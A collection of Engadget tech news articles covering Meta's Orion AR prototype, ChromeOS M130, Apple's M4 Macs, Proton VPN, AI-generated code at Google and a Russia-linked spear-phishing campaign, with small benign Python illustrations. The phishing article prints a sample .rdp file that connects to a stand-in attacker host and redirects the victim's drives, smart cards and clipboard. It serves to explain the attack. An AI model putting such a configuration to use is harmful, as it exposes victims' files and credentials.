Meta’s Orion prototype offers a glimpse into our AR future

If you’re excited, or even just a little curious, about the future of augmented reality, Meta’s Orion prototype makes the most compelling case yet for the technology.

For Meta, Orion is about more than finally making AR glasses a reality. It’s also the company’s best shot at becoming less dependent on Apple and Google’s app stores, and the rules that come with them. If Orion succeeds, then maybe we won’t need smartphones for much at all. Glasses, Zuckerberg has speculated, might eventually become “the main way we do computing.”

At the moment, it’s still way too early to know if Zuckerberg’s bet will actually pay off. Orion is, for now, still a prototype. Meta hasn’t said when it might become widely available or how much it might cost. That's partly because the company, which has already poured tens of billions of dollars into AR and VR research, still needs to figure out how to make Orion significantly more affordable than the $10,000 it reportedly costs to make the current version. It also needs to refine Orion’s hardware and software. And, perhaps most importantly, the company will eventually need to persuade its vast user base that AI-infused, eye-tracking glasses offer a better way to navigate the world.

Still, Meta has been eager to show off Orion since its reveal at Connect. And, after recently getting a chance to try out Orion for myself, it’s easy to see why: Orion is the most impressive AR hardware I’ve seen.

Meta has clearly gone to great lengths to make its AR glasses look, well, normal. While Snap has been mocked for its oversized Spectacles, Orion’s shape and size is closer to a traditional pair of frames.

Even so, they’re still noticeably wide and chunky. The thick black frames, which house an array of cameras, sensors and custom silicon, may work on some face shapes, but I don’t think they are particularly flattering. And while they look less cartoonish than Snap’s AR Spectacles, I’m pretty sure I’d still get some funny looks if I walked around with them in public. At 98 grams, the glasses were noticeably bulkier than my typical prescription lenses, but never felt heavy.

In addition to the actual glasses, Orion relies on two other pieces of kit: a 182-gram wireless compute puck, which needs to stay near the glasses, and an electromyography (EMG) wristband that allows you to control the AR interface with a series of hand gestures. The puck I saw was equipped with its own cameras and sensors, but Meta told me they’ve since simplified the remote control-shaped device so that it’s mainly used for connectivity and processing.

When I first saw the three-piece Orion setup at Connect, it struck me as an interesting compromise to keep the glasses smaller. But after trying it all together, it really doesn’t feel like a compromise at all.

What the Orion glasses look like on.
The glasses were a bit wider than my face.
Karissa Bell for Engadget

You control Orion’s interface through a combination of eye tracking and gestures. After a quick calibration the first time you put the glasses on, you can navigate the AR apps and menus by glancing around the interface and tapping your thumb and index finger together. Meta has been experimenting with wrist-based neural interfaces for years, and Orion’s EMG wristband is the result of that work. The band, which feels like little more than a fabric watch band, uses sensors to detect the electrical signals that occur with even subtle movements of your wrist and fingers. Meta then uses machine learning to decode those signals and send them to the glasses.
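Meta hasn’t published how its decoder actually works, but the pipeline it describes — sample a window of multi-channel wrist signal, extract features, classify the gesture — can be sketched with a toy example. Everything below is hypothetical and deliberately simplified: synthetic signals, a classic mean-absolute-value feature, and a nearest-centroid classifier standing in for Meta’s learned model.

```python
import numpy as np

def extract_features(window: np.ndarray) -> np.ndarray:
    """Mean absolute value per channel -- a classic surface-EMG feature
    that roughly tracks muscle activation strength."""
    return np.mean(np.abs(window), axis=0)

class NearestCentroidDecoder:
    """Toy stand-in for a learned decoder: label a signal window
    by the nearest class centroid in feature space."""

    def fit(self, windows, labels):
        feats = np.array([extract_features(w) for w in windows])
        labels = np.array(labels)
        self.centroids_ = {
            label: feats[labels == label].mean(axis=0)
            for label in np.unique(labels)
        }
        return self

    def predict(self, window):
        f = extract_features(window)
        return min(self.centroids_,
                   key=lambda label: np.linalg.norm(f - self.centroids_[label]))

# Synthetic 8-channel EMG: "rest" is faint noise, "pinch" is a strong burst.
rng = np.random.default_rng(0)
rest_windows = [rng.normal(0, 0.05, (200, 8)) for _ in range(20)]
pinch_windows = [rng.normal(0, 0.6, (200, 8)) for _ in range(20)]
decoder = NearestCentroidDecoder().fit(
    rest_windows + pinch_windows, ["rest"] * 20 + ["pinch"] * 20
)

print(decoder.predict(rng.normal(0, 0.05, (200, 8))))  # rest
print(decoder.predict(rng.normal(0, 0.6, (200, 8))))   # pinch
```

The real system is far more sophisticated — it has to separate a deliberate finger tap from ordinary hand movement in real time — but the shape of the problem is the same: turn raw electrical signals into a small vocabulary of discrete commands.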

That may sound complicated, but I was surprised by how intuitive the navigation felt. The combination of quick gestures and eye tracking felt much more precise than hand tracking controls I’ve used in VR. And while Orion also has hand-tracking abilities, it feels much more natural to quickly tap your fingers together than to extend your hands out in front of your face.

Meta walked me through a number of demos meant to show off Orion’s capabilities. I asked Meta AI to generate an image, and to come up with recipes based on a handful of ingredients on a shelf in front of me. The latter is a trick I’ve also tried with the Ray-Ban Meta Smart Glasses, except with Orion, Meta AI was also able to project the recipe steps onto the wall in front of me.

I also answered a couple of video calls, including one from a surprisingly lifelike Codec Avatar. I watched a YouTube video, scrolled Instagram Reels, and dictated a response to an incoming message. If you’ve used mixed reality headsets, much of this will sound familiar, and a lot of it wasn’t that different from what you can do in VR headsets.

The magic of AR, though, is that everything you see is overlaid onto the world around you and your surroundings are always fully visible. I particularly appreciated this when I got to the gaming portion of the walkthrough. I played a few rounds of a Meta-created game called Stargazer, where players control a retro-looking spacecraft by moving their head to avoid incoming obstacles while shooting enemies with finger tap gestures. Throughout that game, and a subsequent round of AR Pong, I was able to easily keep up a conversation with the people around me while I played. As someone who easily gets motion sick from VR gaming, I appreciated that I never felt disoriented or less aware of my surroundings.

Orion’s displays rely on silicon carbide lenses, micro-LED projectors and waveguides. The actual lenses are clear, though they can dim depending on your environment. One of the most impressive aspects is the 70-degree field of view. It was noticeably wider and more immersive than what I experienced with Snap’s AR Spectacles, which have a 46-degree field of view. At one point, I had three windows open in one multitasking view: Instagram Reels, a video call and a messaging inbox. And while I was definitely aware of the outer limits of the display, I could easily see all three windows without physically moving my head or adjusting my position. It’s still not the all-encompassing AR of sci-fi flicks, but it was wide enough I never struggled to keep the AR content in view.

What was slightly disappointing, though, was the resolution of Orion’s visuals. At 13 pixels per degree, the colors all seemed somewhat muted and projected text was noticeably fuzzy. None of it was difficult to make out, but it was much less vivid than what I saw on Snap’s AR Spectacles, which have a 37 pixels per degree resolution.
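Those two specs trade off directly: multiplying pixels per degree by field of view approximates how many pixels the display spreads across your vision. A back-of-the-envelope comparison, ignoring lens distortion and assuming the quoted figures are horizontal:

```python
def approx_horizontal_pixels(fov_degrees: float, ppd: float) -> float:
    """Rough horizontal pixel count implied by field of view (degrees)
    and angular resolution (pixels per degree); ignores lens distortion."""
    return fov_degrees * ppd

print(approx_horizontal_pixels(70, 13))  # Orion: 910 px spread across 70 degrees
print(approx_horizontal_pixels(46, 37))  # Snap Spectacles: 1702 px across 46 degrees
```

In other words, Orion spends its pixel budget on width while Snap spends it on sharpness. (For reference, roughly 60 pixels per degree is the figure often cited as "retinal" resolution.)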

Meta’s VP of Wearable Devices, Ming Hua, told me that one of the company’s top priorities is to increase the brightness and resolution of Orion’s displays. She said that there’s already a version of the prototype with twice the pixel density, so there’s good reason to believe this will improve over time. She’s also optimistic that Meta will eventually be able to bring down the costs of its AR tech, eventually reducing it to something “similar to a high end phone.”

Leaving my demo at Meta’s headquarters, I was reminded of the first time I tried out a prototype of the wireless VR headset that would eventually become known as Quest, back in 2016. Called Santa Cruz at the time, it was immediately obvious, even to an infrequent VR user, that the wireless, room-tracking headset was the future of the company’s VR business. Now, it’s almost hard to believe there was a time when Meta’s headsets weren’t fully untethered.

Orion has the potential to be much bigger. Meta isn’t just trying to create a more convenient form factor for mixed reality hobbyists and gamers. It’s offering a glimpse into how it views the future, and what our lives might look like when we’re no longer tethered to our phones.

For now, Orion is still just that: a glimpse. It’s far more complex than anything the company has attempted with VR. Meta still has a lot of work to do before that AR-enabled future can be a reality. But the prototype shows that much of that vision is closer than we think.

This article originally appeared on Engadget at https://www.engadget.com/ar-vr/metas-orion-prototype-offers-a-glimpse-into-our-ar-future-123038066.html?src=rss

ChromeOS update makes it easier to avoid distractions

Google has released ChromeOS M130 to the stable channel, which means an update is now making its way to your Chromebook if you haven't received it yet. The latest version of the OS comes with a lengthy list of new features, starting with a Focus panel where you can quickly enable or disable Do-not-Disturb mode, create new or select from existing Google Tasks, as well as play music with focus sound or YouTube Music Premium if you have a subscription. Google is also making it easier to insert emojis, GIFs and even Google Drive links with the M130's new Launcher + f shortcut. In addition, the Quick Insert physical key on the Samsung Galaxy Chromebook Plus will be available on more devices coming out next year.

To cut the time you need to find specific files, Google has added a Suggestions section in Tote, the space where you'll find your most recently downloaded items and latest screenshots. You'll now also be able to access all your starred Drive files right on the ChromeOS shelf, even when you're offline. And if you want to pick up from where you'd left off every time you switch on your computer, then you can enable "Welcome Recap" in Settings, which will let you preview and instantly restore apps and tabs from your previous session. 

In case you use your Chromebook to record videos or audio, you can take advantage of ChromeOS M130's studio-style mic function that adds "advanced balancing, reconstruction of fine details and room adaptation" to the standard mic function's noise cancellation and de-reverberation effects. Plus, you can use Google's AI-powered Recorder app, which is debuting with the new OS and which has speech-to-text capabilities that can create transcripts labeling each speaker, as well as summarize recorded content. 

The ChromeOS M130 also integrates appearance effects into the platform's video call controls, adds support for multiple calendars and allows you to move Picture-in-Picture (PiP) windows to one side of your screen to free up space. Finally, if you have a Chromebook Plus device, you'll be able to access an AI-powered feature called "Help me read" that makes it easy to find information in any text you're reading on your browser and in your Gallery. 

This article originally appeared on Engadget at https://www.engadget.com/computing/laptops/chromeos-update-makes-it-easier-to-avoid-distractions-120030197.html?src=rss

Everything Apple announced during its unofficial Mac Week

Following the illustrious line of calendar-spanning corporate events like Lobsterfest and Shark Week, Apple tried something new this year with a celebration unofficially known as Mac Week. (Fortunately for Apple, it just so happens to coincide with its earnings call on Thursday!) The company’s three-day product rollout for desktop hardware centered around the M4 chip, built for Apple Intelligence. We recount everything Apple spit out this week, including a new iMac, Mac mini, MacBook Pro and other goodies like Apple Intelligence’s official arrival on iOS, iPadOS and macOS.

Standard product shot of the new iMac
Apple

The M4-powered iMac has the same design (apart from some new colors) but with more horsepower inside. Apple says the all-in-one desktop is 1.7 times faster for daily productivity and 2.1 times faster for more demanding tasks like gaming or photo editing. Like all new Macs announced this week, it loses the measly 8GB of RAM previously seen in the cheapest Macs, jumping to 16GB as the baseline. (Woo!)

The new iMac still has a 24-inch 4.5K Retina display encased in an aluminum unibody design. However, it adds a new nano-texture glass screen option for reduced glare and a 12MP Center Stage camera that supports Apple’s Desk View.

You can pre-order the M4 iMac now, starting at $1,299. Deliveries and in-store sales begin on November 8.

Closeup of a person's hand holding the new (tiny) Mac mini
Apple

Apple’s little Mac that could lives up to its “mini” branding more than ever. The 2024 Mac mini is a mere five-inch by five-inch box, two inches tall. (That’s only slightly bigger than the Apple TV 4K!)

The new Mac mini is available in M4 and M4 Pro configurations. Apple says the M4 variant is up to 1.8 times faster than the M1 model from four years ago. Its graphics are up to 2.2 times faster. It should also be much better for Apple Intelligence: It supports 38 TOPS (tera operations per second) of AI processing power. That dwarfs the 18 TOPS from the (only one-year-old) M3 chip. It, too, starts with 16GB of RAM.
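To put that neural engine jump in context, the move from 18 to 38 TOPS is roughly a 2.1x increase in raw throughput — a quick sanity check on the "dwarfs" claim:

```python
def throughput_ratio(new_tops: float, old_tops: float) -> float:
    """Raw neural-engine throughput ratio between two chips, in TOPS
    (tera operations per second). Real-world AI speedups also depend
    on memory bandwidth and model size, so treat this as an upper bound."""
    return new_tops / old_tops

print(round(throughput_ratio(38, 18), 2))  # M4 vs. M3: 2.11
```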

For the first time, the machine ditches legacy USB ports. It has two USB-C ports on the front and three Thunderbolt USB-C ports on the back (along with HDMI and Ethernet).

The M4 Mac mini is available to pre-order. It starts at $599, while the souped-up M4 Pro variant starts at $1,399. It arrives on November 9.

A person sitting in a lab, using the new MacBook Pro with M4 chip.
Apple

Most of Apple’s Mac sales are in the MacBook lineup, which makes sense. Not only can you use them on the go, but you can also grab a Thunderbolt cable and hook them up to the monitor of your choice to double as a desktop. So, the climax of Mac Week was the new M4-powered MacBook Pro.

The only new Mac with three chip tiers, the MacBook Pro comes in M4, M4 Pro and M4 Max options. Apple says the M4 Pro is up to three times faster than the M1 Pro, and the M4 Max is up to 3.5 times faster than the M1 Max. The M4 variant is up to 1.8 times faster than the M1-powered 13-inch MacBook Pro for photo editing. That jumps to 3.4 times faster for demanding work like rendering scenes in Blender.

Its Neural Engine for Apple Intelligence (and other AI) is over three times as powerful as the M1. Helping out on the AI front (and for all-around performance) is the same 16GB of RAM as a baseline.

The laptop offers the same nano-texture display option as the iMac and up to 1,000 nits of brightness for SDR content. It also adopts the 12MP Center Stage camera for much better built-in video call capabilities. The device has three Thunderbolt 4 ports and an estimated 24 hours of battery life — as Apple puts it, that’s the longest ever in a Mac.

The new MacBook Pro is available in familiar 14-inch and 16-inch models. The smaller model with the M4 chip starts at $1,599, the M4 Pro variant starts at $1,999, and the ultra-high-end M4 Max will set you back at least $3,199. The 16-inch MacBook Pro starts at $2,499 with the M4 Pro chip, while an M4 Max flavor is $3,499 and up.

Apple's Craig Federighi standing in front of a screen that reads
Apple

Apple’s first wave of on-device AI features is now in consumers’ hands, with no beta software required. This round includes writing tools like proofreading, rewriting and summaries, live call transcriptions and notification summaries.

The beginnings of a more intelligent Siri also arrived with this batch, including typed queries and an improved ability to recognize stutters or self-interruptions. You also get a neat new glowing border that announces to the world, “This ain’t the shitty Siri you’re used to!” But you’ll have to wait for the next wave of Siri upgrades for a more significant overhaul, like a better understanding of personal context.

Now, the bad news. Apple Intelligence is only available on a handful of recent devices in each of Apple’s major product categories. For the iPhone, that’s the iPhone 15 Pro / Pro Max and the new iPhone 16 lineup (including non-Pro models). You’ll need a model with an M-series chip on the iPad, although the new iPad mini (with an A17 Pro chip) is an exception. As for Macs, you’ll also need a model with M-series Apple silicon, which covers roughly the last four years of models.

Apple Intelligence (round one) requires iOS 18.1, iPadOS 18.1 or macOS Sequoia 15.1. The X.2 variants of each OS will bring the next wave of AI features, like ChatGPT integration and Image Playground.

Screen of an Apple hearing test
Apple

Not to be missed among the higher-profile announcements is a new series of hearing health tools for AirPods Pro 2 owners.

Announced at Apple’s September iPhone launch, the hearing features include a “clinically validated” hearing test, hearing protection (like for concerts) and the ability to use the device as a hearing aid if it detects mild to moderate impairment. (If severe, it will nudge you towards a professional.)

Engadget’s audio guru, Billy Steele, is the person to follow for more on these features. He’s extensively trialed them, including taking hearing tests with an Apple rep and test-driving AirPods-powered hearing protection at concerts.

This article originally appeared on Engadget at https://www.engadget.com/computing/everything-apple-announced-during-its-unofficial-mac-week-210115997.html?src=rss

Proton brings its VPN to Apple TV with new app

Proton announced the debut of an Apple TV app for its virtual private network. The new app, which was "among the most requested features from our community," according to the company's blog post, is available for download from the App Store on any Apple TV. It will allow customers with a paid Proton VPN plan to stream their media content from any location on Apple's set-top box.

Proton VPN was our favorite when we reviewed it in 2023, and it's still our top pick this year for a virtual private network. The service boasts excellent features for security, privacy and usability. Our only real complaint was that the free tier comes with a lot of limitations. But if you're interested in the company's platform, Proton is currently running an early Black Friday deal where you can snag one- or two-year plans at a steep discount.

This article originally appeared on Engadget at https://www.engadget.com/cybersecurity/vpn/proton-brings-its-vpn-to-apple-tv-with-new-app-204549019.html?src=rss

Google CEO says a quarter of the company’s new code is already AI generated

Google CEO Sundar Pichai just revealed that AI now generates more than a quarter of new code for its products, according to a company earnings call transcribed by Ars Technica. In other words, AI tools are already having an absolutely mammoth impact on the development of software.

Pichai did say that human programmers oversee the computer-generated code, which is something. The CEO noted that AI coding helps with “boosting productivity and efficiency," ensuring that engineers “do more and move faster.”

There are no two ways about it: 25 percent is a lot, and Google is just one company relying on AI algorithms to perform complex coding tasks. According to Stack Overflow’s 2024 Developer Survey, over 75 percent of respondents are already using or are “planning to use” AI tools to assist with software development. Another survey by GitHub indicated that 92 percent of US-based developers are currently using AI coding tools.

This leads us to the rampaging elephant in the room. As AI continues to gobble up coding tasks, human experience starts to dwindle. This could eventually lead to a decreased knowledge base in which humans don’t know how to fix errors created by AI algorithms that were, in turn, created by other AI algorithms. We could be staring down an ouroboros of confusion where it’s nearly impossible to detect bugs amidst generations of AI code. Fun times!

We aren’t quite there yet, but AI-assisted coding shows no signs of slowing down. The process started its meteoric rise back in 2022 when GitHub widely launched its Copilot program. Since then, companies like Anthropic, Meta, Google and OpenAI have all released AI-coding software suites. GitHub recently announced that Copilot can now be used with models from Anthropic and Google, in addition to OpenAI.

This article originally appeared on Engadget at https://www.engadget.com/ai/google-ceo-says-a-quarter-of-the-companys-new-code-is-already-ai-generated-180038896.html?src=rss

Cyberpunk 2077: Ultimate Edition will be available for Macs early next year

Cyberpunk 2077 is finally coming to Mac computers. The first-person open world adventure was first released back in 2020, so Apple fans have been waiting nearly half a decade for this release. Developer CD Projekt RED hasn’t issued a launch date yet, but says the game will be available “early next year.”

This isn’t the base game. Mac owners are getting Cyberpunk 2077: Ultimate Edition, which features all pre-existing DLC and patches. This includes the massive Phantom Liberty expansion, which brings Idris Elba into the mix. The expansion was first released last year for consoles and PC.

The developer says this port takes “full advantage of Apple Silicon and the advanced technologies of Metal.” It’ll boast all kinds of modern bells and whistles, like path tracing, frame generation and built-in spatial audio.

As indicated, this port is only for Apple Silicon Macs, but CD Projekt RED hasn’t announced whether there will be any barriers beyond that. We reached out to the developer to ask if the game will run on every chip, from the M1 to the recently announced M4 Max. We’ll update this post when we hear something.

There’s also a cool policy in place for pre-existing players. If you own the game on PC via Steam, the purchase will carry over to Mac. 

This article originally appeared on Engadget at https://www.engadget.com/gaming/pc/cyberpunk-2077-ultimate-edition-will-be-available-for-macs-early-next-year-164520024.html?src=rss

Apple unveils its top-of-the-line M4 Max chip

Apple is continuing its week of announcements by revealing the latest MacBook Pro lineup, as well as its new top-of-the-line chip. The M4 Max has a 40-core GPU, double the number of cores found in the M4 Pro that the company revealed this week. It has a 16-core CPU with 12 performance and four efficiency cores and a 16-core neural engine that's said to be three times faster than the one on the M1 chip. The M4 Max supports up to 128GB of RAM with what Apple claims is 30 percent more memory bandwidth than the M3 Max offers.

The GPU is said to have faster cores and a ray-tracing engine that's twice as fast as the M3 chips. Apple claims the neural engine is up to twice as fast as the one on the previous-generation chipsets as well. In addition, Apple says the CPU is up to 2.2 times faster than the one in the M1 Max. 

As with the M4 and M4 Pro, the M4 Max is built on second-gen 3nm tech to bolster power efficiency and performance. Like the M4 Pro (which can be used to power the new Mac mini), the M4 Max supports Thunderbolt 5, which should make it faster to move files around as it has a data transfer capacity of up to 120 Gbps. And, as with all of Apple's other M-series Macs, devices running on the M4 Max will support Apple Intelligence features.

This article originally appeared on Engadget at https://www.engadget.com/computing/apple-unveils-its-top-of-the-line-m4-max-chip-150241987.html?src=rss

Apple’s MacBook Pros get an M4 upgrade, including the new M4 Max chip

Not that it's a huge surprise after Apple's week of M4 upgrades — first with the 24-inch iMac, then the adorable new Mac mini — but today the company is also bringing its M4 chips to the 14-inch and 16-inch MacBook Pro. And, in addition to the base M4 chip and the M4 Pro, they can also be configured with the newly announced M4 Max.

Apple isn't sneaking in any major tweaks this time around, aside from bringing over the Space Black color option to the 14-inch MacBook Pro. Still, the internal upgrades should be compelling for anyone with an M1 MacBook Pro or an older Intel model. Just like with the M4 iMac and Mac mini, Apple is also making 16GB of RAM the default for the $1,599 14-inch MacBook Pro (fixing one of our biggest issues with that model). You can thank Apple Intelligence for that memory bump, even if you don't give a lick about AI.


Apple isn't saying much about the M4 Max chip yet, but we know it'll feature up to a 16-core CPU (12 performance cores and 4 efficiency cores), and a 40-core GPU. In comparison, the M4 Pro sports a 14-core CPU and 20-core GPU, while the plain M4 chip comes with either 8 or 10 cores alongside a 10-core graphics chip. The M4 Max chip also supports up to 128GB of RAM with 30 percent more memory bandwidth than the M3 Max.

As for other upgrades, the M4 Pro and M4 Max MacBook Pros will also include three Thunderbolt 5 USB-C ports, just like the M4 Pro-equipped Mac mini. If you're constantly moving enormous files around, that alone could be a reason to step up, since Thunderbolt 5 can support up to 80 Gbps speeds (it can also reach up to 120 Gbps with its Bandwidth Boost feature). That's a huge step up from the 40 Gbps limit of Thunderbolt 3 and 4, and it also opens the door to better support for external GPUs and powerful AI accelerators.
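To put those link speeds in perspective, here's a quick back-of-the-envelope calculation. It assumes the link runs at its full rated rate, ignoring protocol overhead, so real-world transfers will be somewhat slower:

```python
def transfer_seconds(file_size_gb: float, link_gbps: float) -> float:
    """Ideal time to move a file over a link, ignoring protocol overhead.

    file_size_gb is in gigabytes; link_gbps is the link rate in gigabits
    per second, so we multiply the size by 8 to convert bytes to bits.
    """
    return file_size_gb * 8 / link_gbps

# Moving a 100 GB video project over each generation's peak rate:
for speed in (40, 80, 120):  # TB3/TB4, TB5 baseline, TB5 Bandwidth Boost
    print(f"{speed} Gbps: ~{transfer_seconds(100, speed):.0f} seconds")
```

Under those idealized assumptions, the same 100 GB transfer drops from about 20 seconds over Thunderbolt 3/4 to under 7 seconds with Bandwidth Boost.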


The new MacBook Pros have slightly brighter screens, which can reach up to 1,000 nits of SDR brightness (up from 600 nits before), and there's also a nano-texture display option. That feature is mainly meant for people working in very bright environments or direct sunlight, as it drastically reduces glare. Both machines are also getting 12MP Center Stage webcams, a huge upgrade over the previous 1080p cameras.

The 14-inch M4 MacBook Pro still starts at $1,599 ($1,499 for education customers), while the M4 Pro model starts at $1,999 ($1,849 for education). The 16-inch MacBook Pro, meanwhile, still starts at $2,499 ($2,299 for education customers). You can pre-order both laptops today, and they'll be in stores on November 8.

This article originally appeared on Engadget at https://www.engadget.com/computing/laptops/apples-macbook-pros-get-an-m4-upgrade-including-the-new-m4-max-chip-150055208.html?src=rss

Microsoft issues warning for ongoing Russia-affiliated spear-phishing campaign

Microsoft has issued a warning about an ongoing spear-phishing campaign by a threat actor called Midnight Blizzard, which US and UK authorities previously linked to Russia's intelligence agency. The company said it discovered that the bad actor has been sending out "highly targeted spear-phishing emails" since at least October 22 and that it believes the operation's goal is to collect intelligence. Based on its observations, the group has been sending emails to individuals linked to various sectors, but it's known for targeting both government and non-government organizations, IT service providers, academia and defense. In addition, while it mostly focuses on organizations in the US and in Europe, this campaign also targeted individuals in Australia and Japan.

Midnight Blizzard has already sent out thousands of spear-phishing emails to over 100 organizations for this campaign, Microsoft said, explaining that those emails contain a signed Remote Desktop Protocol (RDP) configuration file that connects to a server the bad actor controls. The group used email addresses belonging to real organizations, stolen during its previous activities, to make targets think they're opening legitimate emails. It also used social engineering techniques to make it look like the emails were sent by employees of Microsoft or Amazon Web Services.

If someone clicks and opens the RDP attachment, a connection is established to the server Midnight Blizzard controls. That gives the bad actor access to the target's files, any network drives or peripherals (such as microphones and printers) connected to their computer, as well as their passkeys, security keys and other web authentication information. It could also install malware on the target's computer and network, including remote-access trojans that it could use to remain in the victim's system even after the initial connection has been cut off.
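An .rdp attachment is just a plain-text list of connection settings that the Windows Remote Desktop client reads. As a rough illustration of how a single file can hand over that much access, a sketch might look like the following; the property names are standard .rdp settings, but the server address is invented and the exact properties this group used haven't been published:

```ini
full address:s:attacker-controlled.example.com
redirectdrives:i:1
redirectprinters:i:1
redirectsmartcards:i:1
redirectclipboard:i:1
```

Each `redirect...:i:1` line shares a class of local resource (drives, printers, smart cards and security keys, the clipboard) with the remote server for the duration of the session, which lines up with the file, peripheral and credential access described above.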

The group is known by many other names, such as Cozy Bear and APT29, but you might remember it as the threat actor behind the 2020 SolarWinds attacks, in which it managed to infiltrate hundreds of organizations around the world. It also broke into the emails of several senior Microsoft executives and other employees earlier this year, accessing communication between the company and its customers. Microsoft didn't say whether this campaign has anything to do with the US presidential election, but it's advising potential targets to be more proactive in protecting their systems.

This article originally appeared on Engadget at https://www.engadget.com/cybersecurity/microsoft-issues-warning-for-ongoing-russia-affiliated-spear-phishing-campaign-120003125.html?src=rss